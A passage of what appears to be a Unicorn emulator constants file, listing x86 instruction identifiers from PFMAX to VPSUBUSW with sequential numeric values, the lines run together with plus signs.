UC_X86_INS_PFMAX = 529 + UC_X86_INS_PFMIN = 530 + UC_X86_INS_PFMUL = 531 + UC_X86_INS_PFNACC = 532 + UC_X86_INS_PFPNACC = 533 + UC_X86_INS_PFRCPIT1 = 534 + UC_X86_INS_PFRCPIT2 = 535 + UC_X86_INS_PFRCP = 536 + UC_X86_INS_PFRSQIT1 = 537 + UC_X86_INS_PFRSQRT = 538 + UC_X86_INS_PFSUBR = 539 + UC_X86_INS_PFSUB = 540 + UC_X86_INS_PHMINPOSUW 
= 541 + UC_X86_INS_PI2FD = 542 + UC_X86_INS_PI2FW = 543 + UC_X86_INS_PINSRB = 544 + UC_X86_INS_PINSRD = 545 + UC_X86_INS_PINSRQ = 546 + UC_X86_INS_PMAXSB = 547 + UC_X86_INS_PMAXSD = 548 + UC_X86_INS_PMAXUD = 549 + UC_X86_INS_PMAXUW = 550 + UC_X86_INS_PMINSB = 551 + UC_X86_INS_PMINSD = 552 + UC_X86_INS_PMINUD = 553 + UC_X86_INS_PMINUW = 554 + UC_X86_INS_PMOVSXBD = 555 + UC_X86_INS_PMOVSXBQ = 556 + UC_X86_INS_PMOVSXBW = 557 + UC_X86_INS_PMOVSXDQ = 558 + UC_X86_INS_PMOVSXWD = 559 + UC_X86_INS_PMOVSXWQ = 560 + UC_X86_INS_PMOVZXBD = 561 + UC_X86_INS_PMOVZXBQ = 562 + UC_X86_INS_PMOVZXBW = 563 + UC_X86_INS_PMOVZXDQ = 564 + UC_X86_INS_PMOVZXWD = 565 + UC_X86_INS_PMOVZXWQ = 566 + UC_X86_INS_PMULDQ = 567 + UC_X86_INS_PMULHRW = 568 + UC_X86_INS_PMULLD = 569 + UC_X86_INS_POP = 570 + UC_X86_INS_POPAW = 571 + UC_X86_INS_POPAL = 572 + UC_X86_INS_POPCNT = 573 + UC_X86_INS_POPF = 574 + UC_X86_INS_POPFD = 575 + UC_X86_INS_POPFQ = 576 + UC_X86_INS_PREFETCH = 577 + UC_X86_INS_PREFETCHNTA = 578 + UC_X86_INS_PREFETCHT0 = 579 + UC_X86_INS_PREFETCHT1 = 580 + UC_X86_INS_PREFETCHT2 = 581 + UC_X86_INS_PREFETCHW = 582 + UC_X86_INS_PSHUFD = 583 + UC_X86_INS_PSHUFHW = 584 + UC_X86_INS_PSHUFLW = 585 + UC_X86_INS_PSLLDQ = 586 + UC_X86_INS_PSRLDQ = 587 + UC_X86_INS_PSWAPD = 588 + UC_X86_INS_PTEST = 589 + UC_X86_INS_PUNPCKHQDQ = 590 + UC_X86_INS_PUNPCKLQDQ = 591 + UC_X86_INS_PUSH = 592 + UC_X86_INS_PUSHAW = 593 + UC_X86_INS_PUSHAL = 594 + UC_X86_INS_PUSHF = 595 + UC_X86_INS_PUSHFD = 596 + UC_X86_INS_PUSHFQ = 597 + UC_X86_INS_RCL = 598 + UC_X86_INS_RCPPS = 599 + UC_X86_INS_RCPSS = 600 + UC_X86_INS_RCR = 601 + UC_X86_INS_RDFSBASE = 602 + UC_X86_INS_RDGSBASE = 603 + UC_X86_INS_RDMSR = 604 + UC_X86_INS_RDPMC = 605 + UC_X86_INS_RDRAND = 606 + UC_X86_INS_RDSEED = 607 + UC_X86_INS_RDTSC = 608 + UC_X86_INS_RDTSCP = 609 + UC_X86_INS_ROL = 610 + UC_X86_INS_ROR = 611 + UC_X86_INS_RORX = 612 + UC_X86_INS_ROUNDPD = 613 + UC_X86_INS_ROUNDPS = 614 + UC_X86_INS_ROUNDSD = 615 + UC_X86_INS_ROUNDSS = 616 + 
UC_X86_INS_RSM = 617 + UC_X86_INS_RSQRTPS = 618 + UC_X86_INS_RSQRTSS = 619 + UC_X86_INS_SAHF = 620 + UC_X86_INS_SAL = 621 + UC_X86_INS_SALC = 622 + UC_X86_INS_SAR = 623 + UC_X86_INS_SARX = 624 + UC_X86_INS_SBB = 625 + UC_X86_INS_SCASB = 626 + UC_X86_INS_SCASD = 627 + UC_X86_INS_SCASQ = 628 + UC_X86_INS_SCASW = 629 + UC_X86_INS_SETAE = 630 + UC_X86_INS_SETA = 631 + UC_X86_INS_SETBE = 632 + UC_X86_INS_SETB = 633 + UC_X86_INS_SETE = 634 + UC_X86_INS_SETGE = 635 + UC_X86_INS_SETG = 636 + UC_X86_INS_SETLE = 637 + UC_X86_INS_SETL = 638 + UC_X86_INS_SETNE = 639 + UC_X86_INS_SETNO = 640 + UC_X86_INS_SETNP = 641 + UC_X86_INS_SETNS = 642 + UC_X86_INS_SETO = 643 + UC_X86_INS_SETP = 644 + UC_X86_INS_SETS = 645 + UC_X86_INS_SFENCE = 646 + UC_X86_INS_SGDT = 647 + UC_X86_INS_SHA1MSG1 = 648 + UC_X86_INS_SHA1MSG2 = 649 + UC_X86_INS_SHA1NEXTE = 650 + UC_X86_INS_SHA1RNDS4 = 651 + UC_X86_INS_SHA256MSG1 = 652 + UC_X86_INS_SHA256MSG2 = 653 + UC_X86_INS_SHA256RNDS2 = 654 + UC_X86_INS_SHL = 655 + UC_X86_INS_SHLD = 656 + UC_X86_INS_SHLX = 657 + UC_X86_INS_SHR = 658 + UC_X86_INS_SHRD = 659 + UC_X86_INS_SHRX = 660 + UC_X86_INS_SHUFPD = 661 + UC_X86_INS_SHUFPS = 662 + UC_X86_INS_SIDT = 663 + UC_X86_INS_FSIN = 664 + UC_X86_INS_SKINIT = 665 + UC_X86_INS_SLDT = 666 + UC_X86_INS_SMSW = 667 + UC_X86_INS_SQRTPD = 668 + UC_X86_INS_SQRTPS = 669 + UC_X86_INS_SQRTSD = 670 + UC_X86_INS_SQRTSS = 671 + UC_X86_INS_FSQRT = 672 + UC_X86_INS_STAC = 673 + UC_X86_INS_STC = 674 + UC_X86_INS_STD = 675 + UC_X86_INS_STGI = 676 + UC_X86_INS_STI = 677 + UC_X86_INS_STMXCSR = 678 + UC_X86_INS_STOSB = 679 + UC_X86_INS_STOSD = 680 + UC_X86_INS_STOSQ = 681 + UC_X86_INS_STOSW = 682 + UC_X86_INS_STR = 683 + UC_X86_INS_FST = 684 + UC_X86_INS_FSTP = 685 + UC_X86_INS_FSTPNCE = 686 + UC_X86_INS_FXCH = 687 + UC_X86_INS_SUBPD = 688 + UC_X86_INS_SUBPS = 689 + UC_X86_INS_FSUBR = 690 + UC_X86_INS_FISUBR = 691 + UC_X86_INS_FSUBRP = 692 + UC_X86_INS_SUBSD = 693 + UC_X86_INS_SUBSS = 694 + UC_X86_INS_FSUB = 695 + UC_X86_INS_FISUB = 696 
+ UC_X86_INS_FSUBP = 697 + UC_X86_INS_SWAPGS = 698 + UC_X86_INS_SYSCALL = 699 + UC_X86_INS_SYSENTER = 700 + UC_X86_INS_SYSEXIT = 701 + UC_X86_INS_SYSRET = 702 + UC_X86_INS_T1MSKC = 703 + UC_X86_INS_TEST = 704 + UC_X86_INS_UD2 = 705 + UC_X86_INS_FTST = 706 + UC_X86_INS_TZCNT = 707 + UC_X86_INS_TZMSK = 708 + UC_X86_INS_FUCOMPI = 709 + UC_X86_INS_FUCOMI = 710 + UC_X86_INS_FUCOMPP = 711 + UC_X86_INS_FUCOMP = 712 + UC_X86_INS_FUCOM = 713 + UC_X86_INS_UD2B = 714 + UC_X86_INS_UNPCKHPD = 715 + UC_X86_INS_UNPCKHPS = 716 + UC_X86_INS_UNPCKLPD = 717 + UC_X86_INS_UNPCKLPS = 718 + UC_X86_INS_VADDPD = 719 + UC_X86_INS_VADDPS = 720 + UC_X86_INS_VADDSD = 721 + UC_X86_INS_VADDSS = 722 + UC_X86_INS_VADDSUBPD = 723 + UC_X86_INS_VADDSUBPS = 724 + UC_X86_INS_VAESDECLAST = 725 + UC_X86_INS_VAESDEC = 726 + UC_X86_INS_VAESENCLAST = 727 + UC_X86_INS_VAESENC = 728 + UC_X86_INS_VAESIMC = 729 + UC_X86_INS_VAESKEYGENASSIST = 730 + UC_X86_INS_VALIGND = 731 + UC_X86_INS_VALIGNQ = 732 + UC_X86_INS_VANDNPD = 733 + UC_X86_INS_VANDNPS = 734 + UC_X86_INS_VANDPD = 735 + UC_X86_INS_VANDPS = 736 + UC_X86_INS_VBLENDMPD = 737 + UC_X86_INS_VBLENDMPS = 738 + UC_X86_INS_VBLENDPD = 739 + UC_X86_INS_VBLENDPS = 740 + UC_X86_INS_VBLENDVPD = 741 + UC_X86_INS_VBLENDVPS = 742 + UC_X86_INS_VBROADCASTF128 = 743 + UC_X86_INS_VBROADCASTI32X4 = 744 + UC_X86_INS_VBROADCASTI64X4 = 745 + UC_X86_INS_VBROADCASTSD = 746 + UC_X86_INS_VBROADCASTSS = 747 + UC_X86_INS_VCMPPD = 748 + UC_X86_INS_VCMPPS = 749 + UC_X86_INS_VCMPSD = 750 + UC_X86_INS_VCMPSS = 751 + UC_X86_INS_VCOMPRESSPD = 752 + UC_X86_INS_VCOMPRESSPS = 753 + UC_X86_INS_VCVTDQ2PD = 754 + UC_X86_INS_VCVTDQ2PS = 755 + UC_X86_INS_VCVTPD2DQX = 756 + UC_X86_INS_VCVTPD2DQ = 757 + UC_X86_INS_VCVTPD2PSX = 758 + UC_X86_INS_VCVTPD2PS = 759 + UC_X86_INS_VCVTPD2UDQ = 760 + UC_X86_INS_VCVTPH2PS = 761 + UC_X86_INS_VCVTPS2DQ = 762 + UC_X86_INS_VCVTPS2PD = 763 + UC_X86_INS_VCVTPS2PH = 764 + UC_X86_INS_VCVTPS2UDQ = 765 + UC_X86_INS_VCVTSD2SI = 766 + UC_X86_INS_VCVTSD2USI = 767 + 
UC_X86_INS_VCVTSS2SI = 768 + UC_X86_INS_VCVTSS2USI = 769 + UC_X86_INS_VCVTTPD2DQX = 770 + UC_X86_INS_VCVTTPD2DQ = 771 + UC_X86_INS_VCVTTPD2UDQ = 772 + UC_X86_INS_VCVTTPS2DQ = 773 + UC_X86_INS_VCVTTPS2UDQ = 774 + UC_X86_INS_VCVTUDQ2PD = 775 + UC_X86_INS_VCVTUDQ2PS = 776 + UC_X86_INS_VDIVPD = 777 + UC_X86_INS_VDIVPS = 778 + UC_X86_INS_VDIVSD = 779 + UC_X86_INS_VDIVSS = 780 + UC_X86_INS_VDPPD = 781 + UC_X86_INS_VDPPS = 782 + UC_X86_INS_VERR = 783 + UC_X86_INS_VERW = 784 + UC_X86_INS_VEXP2PD = 785 + UC_X86_INS_VEXP2PS = 786 + UC_X86_INS_VEXPANDPD = 787 + UC_X86_INS_VEXPANDPS = 788 + UC_X86_INS_VEXTRACTF128 = 789 + UC_X86_INS_VEXTRACTF32X4 = 790 + UC_X86_INS_VEXTRACTF64X4 = 791 + UC_X86_INS_VEXTRACTI128 = 792 + UC_X86_INS_VEXTRACTI32X4 = 793 + UC_X86_INS_VEXTRACTI64X4 = 794 + UC_X86_INS_VEXTRACTPS = 795 + UC_X86_INS_VFMADD132PD = 796 + UC_X86_INS_VFMADD132PS = 797 + UC_X86_INS_VFMADDPD = 798 + UC_X86_INS_VFMADD213PD = 799 + UC_X86_INS_VFMADD231PD = 800 + UC_X86_INS_VFMADDPS = 801 + UC_X86_INS_VFMADD213PS = 802 + UC_X86_INS_VFMADD231PS = 803 + UC_X86_INS_VFMADDSD = 804 + UC_X86_INS_VFMADD213SD = 805 + UC_X86_INS_VFMADD132SD = 806 + UC_X86_INS_VFMADD231SD = 807 + UC_X86_INS_VFMADDSS = 808 + UC_X86_INS_VFMADD213SS = 809 + UC_X86_INS_VFMADD132SS = 810 + UC_X86_INS_VFMADD231SS = 811 + UC_X86_INS_VFMADDSUB132PD = 812 + UC_X86_INS_VFMADDSUB132PS = 813 + UC_X86_INS_VFMADDSUBPD = 814 + UC_X86_INS_VFMADDSUB213PD = 815 + UC_X86_INS_VFMADDSUB231PD = 816 + UC_X86_INS_VFMADDSUBPS = 817 + UC_X86_INS_VFMADDSUB213PS = 818 + UC_X86_INS_VFMADDSUB231PS = 819 + UC_X86_INS_VFMSUB132PD = 820 + UC_X86_INS_VFMSUB132PS = 821 + UC_X86_INS_VFMSUBADD132PD = 822 + UC_X86_INS_VFMSUBADD132PS = 823 + UC_X86_INS_VFMSUBADDPD = 824 + UC_X86_INS_VFMSUBADD213PD = 825 + UC_X86_INS_VFMSUBADD231PD = 826 + UC_X86_INS_VFMSUBADDPS = 827 + UC_X86_INS_VFMSUBADD213PS = 828 + UC_X86_INS_VFMSUBADD231PS = 829 + UC_X86_INS_VFMSUBPD = 830 + UC_X86_INS_VFMSUB213PD = 831 + UC_X86_INS_VFMSUB231PD = 832 + UC_X86_INS_VFMSUBPS 
= 833 + UC_X86_INS_VFMSUB213PS = 834 + UC_X86_INS_VFMSUB231PS = 835 + UC_X86_INS_VFMSUBSD = 836 + UC_X86_INS_VFMSUB213SD = 837 + UC_X86_INS_VFMSUB132SD = 838 + UC_X86_INS_VFMSUB231SD = 839 + UC_X86_INS_VFMSUBSS = 840 + UC_X86_INS_VFMSUB213SS = 841 + UC_X86_INS_VFMSUB132SS = 842 + UC_X86_INS_VFMSUB231SS = 843 + UC_X86_INS_VFNMADD132PD = 844 + UC_X86_INS_VFNMADD132PS = 845 + UC_X86_INS_VFNMADDPD = 846 + UC_X86_INS_VFNMADD213PD = 847 + UC_X86_INS_VFNMADD231PD = 848 + UC_X86_INS_VFNMADDPS = 849 + UC_X86_INS_VFNMADD213PS = 850 + UC_X86_INS_VFNMADD231PS = 851 + UC_X86_INS_VFNMADDSD = 852 + UC_X86_INS_VFNMADD213SD = 853 + UC_X86_INS_VFNMADD132SD = 854 + UC_X86_INS_VFNMADD231SD = 855 + UC_X86_INS_VFNMADDSS = 856 + UC_X86_INS_VFNMADD213SS = 857 + UC_X86_INS_VFNMADD132SS = 858 + UC_X86_INS_VFNMADD231SS = 859 + UC_X86_INS_VFNMSUB132PD = 860 + UC_X86_INS_VFNMSUB132PS = 861 + UC_X86_INS_VFNMSUBPD = 862 + UC_X86_INS_VFNMSUB213PD = 863 + UC_X86_INS_VFNMSUB231PD = 864 + UC_X86_INS_VFNMSUBPS = 865 + UC_X86_INS_VFNMSUB213PS = 866 + UC_X86_INS_VFNMSUB231PS = 867 + UC_X86_INS_VFNMSUBSD = 868 + UC_X86_INS_VFNMSUB213SD = 869 + UC_X86_INS_VFNMSUB132SD = 870 + UC_X86_INS_VFNMSUB231SD = 871 + UC_X86_INS_VFNMSUBSS = 872 + UC_X86_INS_VFNMSUB213SS = 873 + UC_X86_INS_VFNMSUB132SS = 874 + UC_X86_INS_VFNMSUB231SS = 875 + UC_X86_INS_VFRCZPD = 876 + UC_X86_INS_VFRCZPS = 877 + UC_X86_INS_VFRCZSD = 878 + UC_X86_INS_VFRCZSS = 879 + UC_X86_INS_VORPD = 880 + UC_X86_INS_VORPS = 881 + UC_X86_INS_VXORPD = 882 + UC_X86_INS_VXORPS = 883 + UC_X86_INS_VGATHERDPD = 884 + UC_X86_INS_VGATHERDPS = 885 + UC_X86_INS_VGATHERPF0DPD = 886 + UC_X86_INS_VGATHERPF0DPS = 887 + UC_X86_INS_VGATHERPF0QPD = 888 + UC_X86_INS_VGATHERPF0QPS = 889 + UC_X86_INS_VGATHERPF1DPD = 890 + UC_X86_INS_VGATHERPF1DPS = 891 + UC_X86_INS_VGATHERPF1QPD = 892 + UC_X86_INS_VGATHERPF1QPS = 893 + UC_X86_INS_VGATHERQPD = 894 + UC_X86_INS_VGATHERQPS = 895 + UC_X86_INS_VHADDPD = 896 + UC_X86_INS_VHADDPS = 897 + UC_X86_INS_VHSUBPD = 898 + 
UC_X86_INS_VHSUBPS = 899 + UC_X86_INS_VINSERTF128 = 900 + UC_X86_INS_VINSERTF32X4 = 901 + UC_X86_INS_VINSERTF32X8 = 902 + UC_X86_INS_VINSERTF64X2 = 903 + UC_X86_INS_VINSERTF64X4 = 904 + UC_X86_INS_VINSERTI128 = 905 + UC_X86_INS_VINSERTI32X4 = 906 + UC_X86_INS_VINSERTI32X8 = 907 + UC_X86_INS_VINSERTI64X2 = 908 + UC_X86_INS_VINSERTI64X4 = 909 + UC_X86_INS_VINSERTPS = 910 + UC_X86_INS_VLDDQU = 911 + UC_X86_INS_VLDMXCSR = 912 + UC_X86_INS_VMASKMOVDQU = 913 + UC_X86_INS_VMASKMOVPD = 914 + UC_X86_INS_VMASKMOVPS = 915 + UC_X86_INS_VMAXPD = 916 + UC_X86_INS_VMAXPS = 917 + UC_X86_INS_VMAXSD = 918 + UC_X86_INS_VMAXSS = 919 + UC_X86_INS_VMCALL = 920 + UC_X86_INS_VMCLEAR = 921 + UC_X86_INS_VMFUNC = 922 + UC_X86_INS_VMINPD = 923 + UC_X86_INS_VMINPS = 924 + UC_X86_INS_VMINSD = 925 + UC_X86_INS_VMINSS = 926 + UC_X86_INS_VMLAUNCH = 927 + UC_X86_INS_VMLOAD = 928 + UC_X86_INS_VMMCALL = 929 + UC_X86_INS_VMOVQ = 930 + UC_X86_INS_VMOVDDUP = 931 + UC_X86_INS_VMOVD = 932 + UC_X86_INS_VMOVDQA32 = 933 + UC_X86_INS_VMOVDQA64 = 934 + UC_X86_INS_VMOVDQA = 935 + UC_X86_INS_VMOVDQU16 = 936 + UC_X86_INS_VMOVDQU32 = 937 + UC_X86_INS_VMOVDQU64 = 938 + UC_X86_INS_VMOVDQU8 = 939 + UC_X86_INS_VMOVDQU = 940 + UC_X86_INS_VMOVHLPS = 941 + UC_X86_INS_VMOVHPD = 942 + UC_X86_INS_VMOVHPS = 943 + UC_X86_INS_VMOVLHPS = 944 + UC_X86_INS_VMOVLPD = 945 + UC_X86_INS_VMOVLPS = 946 + UC_X86_INS_VMOVMSKPD = 947 + UC_X86_INS_VMOVMSKPS = 948 + UC_X86_INS_VMOVNTDQA = 949 + UC_X86_INS_VMOVNTDQ = 950 + UC_X86_INS_VMOVNTPD = 951 + UC_X86_INS_VMOVNTPS = 952 + UC_X86_INS_VMOVSD = 953 + UC_X86_INS_VMOVSHDUP = 954 + UC_X86_INS_VMOVSLDUP = 955 + UC_X86_INS_VMOVSS = 956 + UC_X86_INS_VMOVUPD = 957 + UC_X86_INS_VMOVUPS = 958 + UC_X86_INS_VMPSADBW = 959 + UC_X86_INS_VMPTRLD = 960 + UC_X86_INS_VMPTRST = 961 + UC_X86_INS_VMREAD = 962 + UC_X86_INS_VMRESUME = 963 + UC_X86_INS_VMRUN = 964 + UC_X86_INS_VMSAVE = 965 + UC_X86_INS_VMULPD = 966 + UC_X86_INS_VMULPS = 967 + UC_X86_INS_VMULSD = 968 + UC_X86_INS_VMULSS = 969 + 
UC_X86_INS_VMWRITE = 970 + UC_X86_INS_VMXOFF = 971 + UC_X86_INS_VMXON = 972 + UC_X86_INS_VPABSB = 973 + UC_X86_INS_VPABSD = 974 + UC_X86_INS_VPABSQ = 975 + UC_X86_INS_VPABSW = 976 + UC_X86_INS_VPACKSSDW = 977 + UC_X86_INS_VPACKSSWB = 978 + UC_X86_INS_VPACKUSDW = 979 + UC_X86_INS_VPACKUSWB = 980 + UC_X86_INS_VPADDB = 981 + UC_X86_INS_VPADDD = 982 + UC_X86_INS_VPADDQ = 983 + UC_X86_INS_VPADDSB = 984 + UC_X86_INS_VPADDSW = 985 + UC_X86_INS_VPADDUSB = 986 + UC_X86_INS_VPADDUSW = 987 + UC_X86_INS_VPADDW = 988 + UC_X86_INS_VPALIGNR = 989 + UC_X86_INS_VPANDD = 990 + UC_X86_INS_VPANDND = 991 + UC_X86_INS_VPANDNQ = 992 + UC_X86_INS_VPANDN = 993 + UC_X86_INS_VPANDQ = 994 + UC_X86_INS_VPAND = 995 + UC_X86_INS_VPAVGB = 996 + UC_X86_INS_VPAVGW = 997 + UC_X86_INS_VPBLENDD = 998 + UC_X86_INS_VPBLENDMB = 999 + UC_X86_INS_VPBLENDMD = 1000 + UC_X86_INS_VPBLENDMQ = 1001 + UC_X86_INS_VPBLENDMW = 1002 + UC_X86_INS_VPBLENDVB = 1003 + UC_X86_INS_VPBLENDW = 1004 + UC_X86_INS_VPBROADCASTB = 1005 + UC_X86_INS_VPBROADCASTD = 1006 + UC_X86_INS_VPBROADCASTMB2Q = 1007 + UC_X86_INS_VPBROADCASTMW2D = 1008 + UC_X86_INS_VPBROADCASTQ = 1009 + UC_X86_INS_VPBROADCASTW = 1010 + UC_X86_INS_VPCLMULQDQ = 1011 + UC_X86_INS_VPCMOV = 1012 + UC_X86_INS_VPCMPB = 1013 + UC_X86_INS_VPCMPD = 1014 + UC_X86_INS_VPCMPEQB = 1015 + UC_X86_INS_VPCMPEQD = 1016 + UC_X86_INS_VPCMPEQQ = 1017 + UC_X86_INS_VPCMPEQW = 1018 + UC_X86_INS_VPCMPESTRI = 1019 + UC_X86_INS_VPCMPESTRM = 1020 + UC_X86_INS_VPCMPGTB = 1021 + UC_X86_INS_VPCMPGTD = 1022 + UC_X86_INS_VPCMPGTQ = 1023 + UC_X86_INS_VPCMPGTW = 1024 + UC_X86_INS_VPCMPISTRI = 1025 + UC_X86_INS_VPCMPISTRM = 1026 + UC_X86_INS_VPCMPQ = 1027 + UC_X86_INS_VPCMPUB = 1028 + UC_X86_INS_VPCMPUD = 1029 + UC_X86_INS_VPCMPUQ = 1030 + UC_X86_INS_VPCMPUW = 1031 + UC_X86_INS_VPCMPW = 1032 + UC_X86_INS_VPCOMB = 1033 + UC_X86_INS_VPCOMD = 1034 + UC_X86_INS_VPCOMPRESSD = 1035 + UC_X86_INS_VPCOMPRESSQ = 1036 + UC_X86_INS_VPCOMQ = 1037 + UC_X86_INS_VPCOMUB = 1038 + UC_X86_INS_VPCOMUD = 1039 + 
UC_X86_INS_VPCOMUQ = 1040 + UC_X86_INS_VPCOMUW = 1041 + UC_X86_INS_VPCOMW = 1042 + UC_X86_INS_VPCONFLICTD = 1043 + UC_X86_INS_VPCONFLICTQ = 1044 + UC_X86_INS_VPERM2F128 = 1045 + UC_X86_INS_VPERM2I128 = 1046 + UC_X86_INS_VPERMD = 1047 + UC_X86_INS_VPERMI2D = 1048 + UC_X86_INS_VPERMI2PD = 1049 + UC_X86_INS_VPERMI2PS = 1050 + UC_X86_INS_VPERMI2Q = 1051 + UC_X86_INS_VPERMIL2PD = 1052 + UC_X86_INS_VPERMIL2PS = 1053 + UC_X86_INS_VPERMILPD = 1054 + UC_X86_INS_VPERMILPS = 1055 + UC_X86_INS_VPERMPD = 1056 + UC_X86_INS_VPERMPS = 1057 + UC_X86_INS_VPERMQ = 1058 + UC_X86_INS_VPERMT2D = 1059 + UC_X86_INS_VPERMT2PD = 1060 + UC_X86_INS_VPERMT2PS = 1061 + UC_X86_INS_VPERMT2Q = 1062 + UC_X86_INS_VPEXPANDD = 1063 + UC_X86_INS_VPEXPANDQ = 1064 + UC_X86_INS_VPEXTRB = 1065 + UC_X86_INS_VPEXTRD = 1066 + UC_X86_INS_VPEXTRQ = 1067 + UC_X86_INS_VPEXTRW = 1068 + UC_X86_INS_VPGATHERDD = 1069 + UC_X86_INS_VPGATHERDQ = 1070 + UC_X86_INS_VPGATHERQD = 1071 + UC_X86_INS_VPGATHERQQ = 1072 + UC_X86_INS_VPHADDBD = 1073 + UC_X86_INS_VPHADDBQ = 1074 + UC_X86_INS_VPHADDBW = 1075 + UC_X86_INS_VPHADDDQ = 1076 + UC_X86_INS_VPHADDD = 1077 + UC_X86_INS_VPHADDSW = 1078 + UC_X86_INS_VPHADDUBD = 1079 + UC_X86_INS_VPHADDUBQ = 1080 + UC_X86_INS_VPHADDUBW = 1081 + UC_X86_INS_VPHADDUDQ = 1082 + UC_X86_INS_VPHADDUWD = 1083 + UC_X86_INS_VPHADDUWQ = 1084 + UC_X86_INS_VPHADDWD = 1085 + UC_X86_INS_VPHADDWQ = 1086 + UC_X86_INS_VPHADDW = 1087 + UC_X86_INS_VPHMINPOSUW = 1088 + UC_X86_INS_VPHSUBBW = 1089 + UC_X86_INS_VPHSUBDQ = 1090 + UC_X86_INS_VPHSUBD = 1091 + UC_X86_INS_VPHSUBSW = 1092 + UC_X86_INS_VPHSUBWD = 1093 + UC_X86_INS_VPHSUBW = 1094 + UC_X86_INS_VPINSRB = 1095 + UC_X86_INS_VPINSRD = 1096 + UC_X86_INS_VPINSRQ = 1097 + UC_X86_INS_VPINSRW = 1098 + UC_X86_INS_VPLZCNTD = 1099 + UC_X86_INS_VPLZCNTQ = 1100 + UC_X86_INS_VPMACSDD = 1101 + UC_X86_INS_VPMACSDQH = 1102 + UC_X86_INS_VPMACSDQL = 1103 + UC_X86_INS_VPMACSSDD = 1104 + UC_X86_INS_VPMACSSDQH = 1105 + UC_X86_INS_VPMACSSDQL = 1106 + UC_X86_INS_VPMACSSWD = 1107 + 
UC_X86_INS_VPMACSSWW = 1108 + UC_X86_INS_VPMACSWD = 1109 + UC_X86_INS_VPMACSWW = 1110 + UC_X86_INS_VPMADCSSWD = 1111 + UC_X86_INS_VPMADCSWD = 1112 + UC_X86_INS_VPMADDUBSW = 1113 + UC_X86_INS_VPMADDWD = 1114 + UC_X86_INS_VPMASKMOVD = 1115 + UC_X86_INS_VPMASKMOVQ = 1116 + UC_X86_INS_VPMAXSB = 1117 + UC_X86_INS_VPMAXSD = 1118 + UC_X86_INS_VPMAXSQ = 1119 + UC_X86_INS_VPMAXSW = 1120 + UC_X86_INS_VPMAXUB = 1121 + UC_X86_INS_VPMAXUD = 1122 + UC_X86_INS_VPMAXUQ = 1123 + UC_X86_INS_VPMAXUW = 1124 + UC_X86_INS_VPMINSB = 1125 + UC_X86_INS_VPMINSD = 1126 + UC_X86_INS_VPMINSQ = 1127 + UC_X86_INS_VPMINSW = 1128 + UC_X86_INS_VPMINUB = 1129 + UC_X86_INS_VPMINUD = 1130 + UC_X86_INS_VPMINUQ = 1131 + UC_X86_INS_VPMINUW = 1132 + UC_X86_INS_VPMOVDB = 1133 + UC_X86_INS_VPMOVDW = 1134 + UC_X86_INS_VPMOVM2B = 1135 + UC_X86_INS_VPMOVM2D = 1136 + UC_X86_INS_VPMOVM2Q = 1137 + UC_X86_INS_VPMOVM2W = 1138 + UC_X86_INS_VPMOVMSKB = 1139 + UC_X86_INS_VPMOVQB = 1140 + UC_X86_INS_VPMOVQD = 1141 + UC_X86_INS_VPMOVQW = 1142 + UC_X86_INS_VPMOVSDB = 1143 + UC_X86_INS_VPMOVSDW = 1144 + UC_X86_INS_VPMOVSQB = 1145 + UC_X86_INS_VPMOVSQD = 1146 + UC_X86_INS_VPMOVSQW = 1147 + UC_X86_INS_VPMOVSXBD = 1148 + UC_X86_INS_VPMOVSXBQ = 1149 + UC_X86_INS_VPMOVSXBW = 1150 + UC_X86_INS_VPMOVSXDQ = 1151 + UC_X86_INS_VPMOVSXWD = 1152 + UC_X86_INS_VPMOVSXWQ = 1153 + UC_X86_INS_VPMOVUSDB = 1154 + UC_X86_INS_VPMOVUSDW = 1155 + UC_X86_INS_VPMOVUSQB = 1156 + UC_X86_INS_VPMOVUSQD = 1157 + UC_X86_INS_VPMOVUSQW = 1158 + UC_X86_INS_VPMOVZXBD = 1159 + UC_X86_INS_VPMOVZXBQ = 1160 + UC_X86_INS_VPMOVZXBW = 1161 + UC_X86_INS_VPMOVZXDQ = 1162 + UC_X86_INS_VPMOVZXWD = 1163 + UC_X86_INS_VPMOVZXWQ = 1164 + UC_X86_INS_VPMULDQ = 1165 + UC_X86_INS_VPMULHRSW = 1166 + UC_X86_INS_VPMULHUW = 1167 + UC_X86_INS_VPMULHW = 1168 + UC_X86_INS_VPMULLD = 1169 + UC_X86_INS_VPMULLQ = 1170 + UC_X86_INS_VPMULLW = 1171 + UC_X86_INS_VPMULUDQ = 1172 + UC_X86_INS_VPORD = 1173 + UC_X86_INS_VPORQ = 1174 + UC_X86_INS_VPOR = 1175 + UC_X86_INS_VPPERM = 1176 + 
UC_X86_INS_VPROTB = 1177 + UC_X86_INS_VPROTD = 1178 + UC_X86_INS_VPROTQ = 1179 + UC_X86_INS_VPROTW = 1180 + UC_X86_INS_VPSADBW = 1181 + UC_X86_INS_VPSCATTERDD = 1182 + UC_X86_INS_VPSCATTERDQ = 1183 + UC_X86_INS_VPSCATTERQD = 1184 + UC_X86_INS_VPSCATTERQQ = 1185 + UC_X86_INS_VPSHAB = 1186 + UC_X86_INS_VPSHAD = 1187 + UC_X86_INS_VPSHAQ = 1188 + UC_X86_INS_VPSHAW = 1189 + UC_X86_INS_VPSHLB = 1190 + UC_X86_INS_VPSHLD = 1191 + UC_X86_INS_VPSHLQ = 1192 + UC_X86_INS_VPSHLW = 1193 + UC_X86_INS_VPSHUFB = 1194 + UC_X86_INS_VPSHUFD = 1195 + UC_X86_INS_VPSHUFHW = 1196 + UC_X86_INS_VPSHUFLW = 1197 + UC_X86_INS_VPSIGNB = 1198 + UC_X86_INS_VPSIGND = 1199 + UC_X86_INS_VPSIGNW = 1200 + UC_X86_INS_VPSLLDQ = 1201 + UC_X86_INS_VPSLLD = 1202 + UC_X86_INS_VPSLLQ = 1203 + UC_X86_INS_VPSLLVD = 1204 + UC_X86_INS_VPSLLVQ = 1205 + UC_X86_INS_VPSLLW = 1206 + UC_X86_INS_VPSRAD = 1207 + UC_X86_INS_VPSRAQ = 1208 + UC_X86_INS_VPSRAVD = 1209 + UC_X86_INS_VPSRAVQ = 1210 + UC_X86_INS_VPSRAW = 1211 + UC_X86_INS_VPSRLDQ = 1212 + UC_X86_INS_VPSRLD = 1213 + UC_X86_INS_VPSRLQ = 1214 + UC_X86_INS_VPSRLVD = 1215 + UC_X86_INS_VPSRLVQ = 1216 + UC_X86_INS_VPSRLW = 1217 + UC_X86_INS_VPSUBB = 1218 + UC_X86_INS_VPSUBD = 1219 + UC_X86_INS_VPSUBQ = 1220 + UC_X86_INS_VPSUBSB = 1221 + UC_X86_INS_VPSUBSW = 1222 + UC_X86_INS_VPSUBUSB = 1223 + UC_X86_INS_VPSUBUSW = 